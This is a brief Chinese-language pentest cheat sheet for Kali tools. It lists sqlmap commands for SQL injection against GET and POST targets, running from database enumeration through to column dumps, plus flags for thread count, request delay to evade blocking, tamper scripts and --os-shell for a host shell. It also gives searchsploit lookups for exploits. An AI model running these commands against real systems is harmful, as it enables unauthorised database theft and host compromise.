0x00 kali基础工具使用
sqlmap
sql注入
#基本命令get型
sqlmap -u "URL" --dbs
sqlmap -u "URL" -D 数据库名称 --tables
sqlmap -u "URL" -D 数据库名称 -T 数据库表 --column
sqlmap -u "URL" -D 数据库名称 -T 数据表 -C 列 --dump
#基本命令post型
sqlmap -r "数据包" --dbs
sqlmap -r "数据包" -D 数据库名称 --tables
sqlmap -r "数据包" -D 数据库名称 -T 数据库表 --column
sqlmap -r "数据包" -D 数据库名称 -T 数据表 -C 列 --dump
#部分附加命令
--thread -----线程设置,通常赋10
--delay -----请求延时,防止被拉黑
--os-shell -----获取主机shell
--null-connection -----检索没有body响应的内容,多用于盲注
--tamper -----脚本调用
searchsploit
漏洞脚本库,提权,shell获取等等
Usage: searchsploit [options] term1 [term2] ... [termN]
==========
Examples
==========
searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
For more examples, see the manual: https: